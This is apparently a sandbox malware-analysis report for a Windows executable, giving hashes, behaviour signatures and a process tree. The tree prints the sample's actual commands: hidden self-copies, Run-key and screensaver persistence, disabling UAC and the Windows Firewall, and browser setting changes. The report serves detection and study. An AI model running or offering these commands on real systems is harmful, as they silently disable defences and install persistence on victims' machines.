Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
148s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20240709-en -
resource tags
-
submitted
13/07/2024, 11:45
General
-
Target
4188928d42578d01826be310ed423f73_JaffaCakes118.exe
-
Size
399KB
-
MD5
4188928d42578d01826be310ed423f73
-
SHA1
80d1baa6e7384eef1403d6591fcb433a098ba3da
-
SHA256
d6aeb417cf10f28c0f27f6320ee26bbebe4b7da01e1ce7067a2c5353412821d1
-
SHA512
4440ee125d00a98fc38621da9e74adeb3ba84d5a3fd99bc58530d1f4574b9e12db34f10d1e1772d232d6c75f2001303b1723aeb2fadbf20892103ce898bebb24
-
SSDEEP
6144:ipPOC3QN319eNYsHD3AAGoHQH9sWV16w2DklypareA51Pqr+Hf:mODE5HD3LGoHQZykorA51Sg
Score
10/10
Malware Config
Signatures
-
Modifies firewall policy service 3 TTPs 4 IoCs
-
UAC bypass 3 TTPs 2 IoCs
-
Modifies Windows Firewall 2 TTPs 4 IoCs
-
Sets file to hidden 1 TTPs 24 IoCs
Modifies file attributes to stop it showing in Explorer etc.
-
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
-
Executes dropped EXE 2 IoCs
-
Loads dropped DLL 5 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 7 IoCs
-
Drops desktop.ini file(s) 7 IoCs
-
Enumerates connected drives 3 TTPs 46 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Drops autorun.inf file 1 TTPs 22 IoCs
Malware can abuse Windows Autorun to spread further via attached volumes.
-
Drops file in System32 directory 5 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 64 IoCs
-
Drops file in Windows directory 2 IoCs
-
Launches sc.exe 6 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 12 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
-
Modifies Control Panel 2 IoCs
-
Modifies Internet Explorer settings 1 TTPs 28 IoCs
-
Modifies registry class 2 IoCs
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Views/modifies file attributes 1 TTPs 42 IoCs
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\system32\fontdrvhost.exe"fontdrvhost.exe"2⤵
-
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\rawcircle.scrC:\Users\Admin\AppData\Roaming\Microsoft\Windows\rawcircle.scr /s2⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib -R -H -S "%appdata%\advant.exe"3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib -R -H -S "C:\Users\Admin\AppData\Roaming\advant.exe"4⤵
- Views/modifies file attributes
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\rawcircle.scr" "%appdata%\advant.exe"3⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib +R +H +S "%appdata%\advant.exe"3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +R +H +S "C:\Users\Admin\AppData\Roaming\advant.exe"4⤵
- Sets file to hidden
- Views/modifies file attributes
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKCU\software\microsoft\windows\currentversion\run" /v "advant" /t REG_SZ /d "%appdata%\advant.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exereg ADD "HKCU\software\microsoft\windows\currentversion\run" /v "advant" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\advant.exe" /f4⤵
- Adds Run key to start application
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib -R -H -S "%windir%\system32\pcclean.exe"3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib -R -H -S "C:\Windows\system32\pcclean.exe"4⤵
- Drops file in System32 directory
- Views/modifies file attributes
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\rawcircle.scr" "%windir%\system32\pcclean.exe"3⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib +R +H +S "%windir%\system32\pcclean.exe"3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +R +H +S "C:\Windows\system32\pcclean.exe"4⤵
- Sets file to hidden
- Drops file in System32 directory
- Views/modifies file attributes
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c md %appdata%\Microsoft\Windows3⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib -R -H -S "%appdata%\Microsoft\Windows\rawcircle.scr"3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib -R -H -S "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\rawcircle.scr"4⤵
- Views/modifies file attributes
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\rawcircle.scr" "%appdata%\Microsoft\Windows\rawcircle.scr"3⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib +R +H +S "%appdata%\Microsoft\Windows\rawcircle.scr"3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +R +H +S "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\rawcircle.scr"4⤵
- Sets file to hidden
- Views/modifies file attributes
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKCU\Control Panel\Desktop" /v "SCRNSAVE.EXE" /t REG_SZ /d "%appdata%\Microsoft\Windows\rawcircle.scr" /f3⤵
-
C:\Windows\SysWOW64\reg.exereg ADD "HKCU\Control Panel\Desktop" /v "SCRNSAVE.EXE" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\rawcircle.scr" /f4⤵
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKCU\Control Panel\Desktop" /v ScreenSaveActive /t REG_SZ /d "1" /f3⤵
-
C:\Windows\SysWOW64\reg.exereg ADD "HKCU\Control Panel\Desktop" /v ScreenSaveActive /t REG_SZ /d "1" /f4⤵
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKCU\Control Panel\Desktop" /v ScreenSaveTimeOut /t REG_SZ /d "60" /f3⤵
-
C:\Windows\SysWOW64\reg.exereg ADD "HKCU\Control Panel\Desktop" /v ScreenSaveTimeOut /t REG_SZ /d "60" /f4⤵
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c NET START seclogon3⤵
-
C:\Windows\SysWOW64\net.exeNET START seclogon4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 START seclogon5⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c rd /s /q "%appdata%\Macromedia\Flash Player\#SharedObjects"3⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v EnableBalloonTips /t REG_DWORD /d 0 /f3⤵
-
C:\Windows\SysWOW64\reg.exereg ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v EnableBalloonTips /t REG_DWORD /d 0 /f4⤵
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg DELETE "HKCU\software\microsoft\windows\currentversion\action center\checks" /f3⤵
-
C:\Windows\SysWOW64\reg.exereg DELETE "HKCU\software\microsoft\windows\currentversion\action center\checks" /f4⤵
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f3⤵
-
C:\Windows\SysWOW64\reg.exereg ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f4⤵
- UAC bypass
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c sc config upnphost start= auto3⤵
-
C:\Windows\SysWOW64\sc.exesc config upnphost start= auto4⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c sc config SSDPSRV start= auto3⤵
-
C:\Windows\SysWOW64\sc.exesc config SSDPSRV start= auto4⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c sc config browser start= auto3⤵
-
C:\Windows\SysWOW64\sc.exesc config browser start= auto4⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c net start upnphost3⤵
-
C:\Windows\SysWOW64\net.exenet start upnphost4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start upnphost5⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c net start SSDPSRV3⤵
-
C:\Windows\SysWOW64\net.exenet start SSDPSRV4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start SSDPSRV5⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c net start browser3⤵
-
C:\Windows\SysWOW64\net.exenet start browser4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start browser5⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c netsh advfirewall set currentprofile state off3⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall set currentprofile state off4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile" /v EnableFirewall /t REG_DWORD /d 0 /f3⤵
-
C:\Windows\SysWOW64\reg.exereg ADD "HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile" /v EnableFirewall /t REG_DWORD /d 0 /f4⤵
- Modifies firewall policy service
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\StandardProfile" /v EnableFirewall /t REG_DWORD /d 0 /f3⤵
-
C:\Windows\SysWOW64\reg.exereg ADD "HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\StandardProfile" /v EnableFirewall /t REG_DWORD /d 0 /f4⤵
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\DomainProfile" /v EnableFirewall /t REG_DWORD /d 0 /f3⤵
-
C:\Windows\SysWOW64\reg.exereg ADD "HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\DomainProfile" /v EnableFirewall /t REG_DWORD /d 0 /f4⤵
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c netsh advfirewall set currentprofile state off3⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall set currentprofile state off4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\Software\Microsoft\Internet Explorer\Main\FeatureControl" /v FEATURE_WEBOC_POPUPMANAGEMENT /t REG_DWORD /d 0 /f3⤵
-
C:\Windows\SysWOW64\reg.exereg ADD "HKLM\Software\Microsoft\Internet Explorer\Main\FeatureControl" /v FEATURE_WEBOC_POPUPMANAGEMENT /t REG_DWORD /d 0 /f4⤵
- Modifies Internet Explorer settings
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\Software\Microsoft\Internet Explorer\Main" /v Show_FullURL /t REG_SZ /d yes /f3⤵
-
C:\Windows\SysWOW64\reg.exereg ADD "HKLM\Software\Microsoft\Internet Explorer\Main" /v Show_FullURL /t REG_SZ /d yes /f4⤵
- Modifies Internet Explorer settings
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\Software\Microsoft\Internet Explorer\Main" /v Show_StatusBar /t REG_SZ /d yes /f3⤵
-
C:\Windows\SysWOW64\reg.exereg ADD "HKLM\Software\Microsoft\Internet Explorer\Main" /v Show_StatusBar /t REG_SZ /d yes /f4⤵
- Modifies Internet Explorer settings
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\Software\Microsoft\Internet Explorer\Main" /v Show_URLinStatusBar /t REG_SZ /d yes /f3⤵
-
C:\Windows\SysWOW64\reg.exereg ADD "HKLM\Software\Microsoft\Internet Explorer\Main" /v Show_URLinStatusBar /t REG_SZ /d yes /f4⤵
- Modifies Internet Explorer settings
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\Software\Microsoft\Internet Explorer\MINIE" /v ShowStatusBar /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\SysWOW64\reg.exereg ADD "HKLM\Software\Microsoft\Internet Explorer\MINIE" /v ShowStatusBar /t REG_DWORD /d 1 /f4⤵
- Modifies Internet Explorer settings
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg DELETE "HKCU\AppEvents\Schemes\Apps\Explorer\Navigating\.Current" /f3⤵
-
C:\Windows\SysWOW64\reg.exereg DELETE "HKCU\AppEvents\Schemes\Apps\Explorer\Navigating\.Current" /f4⤵
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg DELETE "HKCU\AppEvents\Schemes\Apps\Explorer\Navigating\.Default" /f3⤵
-
C:\Windows\SysWOW64\reg.exereg DELETE "HKCU\AppEvents\Schemes\Apps\Explorer\Navigating\.Default" /f4⤵
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKCU\Software\Microsoft\Internet Explorer\Main" /v Check_Associations /t REG_SZ /d no /f3⤵
-
C:\Windows\SysWOW64\reg.exereg ADD "HKCU\Software\Microsoft\Internet Explorer\Main" /v Check_Associations /t REG_SZ /d no /f4⤵
- Modifies Internet Explorer settings
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKCU\Software\Microsoft\Internet Explorer\Main" /v "DisableFirstRunCustomize" /t REG_DWORD /d "1" /f3⤵
-
C:\Windows\SysWOW64\reg.exereg ADD "HKCU\Software\Microsoft\Internet Explorer\Main" /v "DisableFirstRunCustomize" /t REG_DWORD /d "1" /f4⤵
- Modifies Internet Explorer settings
-
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe"3⤵
-
-
C:\Program Files (x86)\Windows Media Player\wmplayer.exe"C:\Program Files (x86)\Windows Media Player\wmplayer.exe"3⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c rd /s /q "%appdata%\Macromedia\Flash Player\#SharedObjects"3⤵
-
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
-
C:\Windows\system32\fontdrvhost.exe"fontdrvhost.exe"1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p1⤵
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding2⤵
-
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}2⤵
-
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca2⤵
-
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding2⤵
-
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca2⤵
-
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding2⤵
-
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding2⤵
-
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}2⤵
-
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe" -ServerName:InputApp.AppX9jnwykgrccxc8by3hsrsh07r423xzvav.mca2⤵
-
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding2⤵
-
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:CortanaUI.AppX3bn25b6f886wmg6twh46972vprk9tnbf.mca2⤵
-
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding2⤵
-
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding2⤵
-
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding2⤵
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k RPCSS -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
-
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵
-
C:\Windows\system32\sihost.exesihost.exe2⤵
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc1⤵
-
C:\Users\Admin\AppData\Local\Temp\4188928d42578d01826be310ed423f73_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\4188928d42578d01826be310ed423f73_JaffaCakes118.exe"1⤵
- Checks computer location settings
- Loads dropped DLL
- Adds Run key to start application
- Drops autorun.inf file
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\XIo2qNiS.XIo2qNiS2⤵
- Checks computer location settings
- Loads dropped DLL
- Adds Run key to start application
- Drops autorun.inf file
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
-
C:\Users\Admin\AppData\Roaming\XIo2qNiS.XIo2qNiSC:\Users\Admin\AppData\Roaming\XIo2qNiS.XIo2qNiS3⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Drops autorun.inf file
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies Control Panel
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib -R -H -S "%appdata%\advant.exe"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\attrib.exeattrib -R -H -S "C:\Users\Admin\AppData\Roaming\advant.exe"5⤵
- Views/modifies file attributes
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Roaming\XIo2qNiS.XIo2qNiS" "%appdata%\advant.exe"4⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib +R +H +S "%appdata%\advant.exe"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\attrib.exeattrib +R +H +S "C:\Users\Admin\AppData\Roaming\advant.exe"5⤵
- Sets file to hidden
- Views/modifies file attributes
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKCU\software\microsoft\windows\currentversion\run" /v "advant" /t REG_SZ /d "%appdata%\advant.exe" /f4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exereg ADD "HKCU\software\microsoft\windows\currentversion\run" /v "advant" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\advant.exe" /f5⤵
- Adds Run key to start application
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib -R -H -S "%windir%\system32\pcclean.exe"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\attrib.exeattrib -R -H -S "C:\Windows\system32\pcclean.exe"5⤵
- Views/modifies file attributes
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Roaming\XIo2qNiS.XIo2qNiS" "%windir%\system32\pcclean.exe"4⤵
- Drops file in System32 directory
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib +R +H +S "%windir%\system32\pcclean.exe"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\attrib.exeattrib +R +H +S "C:\Windows\system32\pcclean.exe"5⤵
- Sets file to hidden
- Drops file in System32 directory
- Views/modifies file attributes
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c md %appdata%\Microsoft\Windows4⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib -R -H -S "%appdata%\Microsoft\Windows\rawcircle.scr"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\attrib.exeattrib -R -H -S "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\rawcircle.scr"5⤵
- Views/modifies file attributes
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Roaming\XIo2qNiS.XIo2qNiS" "%appdata%\Microsoft\Windows\rawcircle.scr"4⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib +R +H +S "%appdata%\Microsoft\Windows\rawcircle.scr"4⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +R +H +S "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\rawcircle.scr"5⤵
- Sets file to hidden
- Views/modifies file attributes
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKCU\Control Panel\Desktop" /v "SCRNSAVE.EXE" /t REG_SZ /d "%appdata%\Microsoft\Windows\rawcircle.scr" /f4⤵
-
C:\Windows\SysWOW64\reg.exereg ADD "HKCU\Control Panel\Desktop" /v "SCRNSAVE.EXE" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\rawcircle.scr" /f5⤵
-
-
-
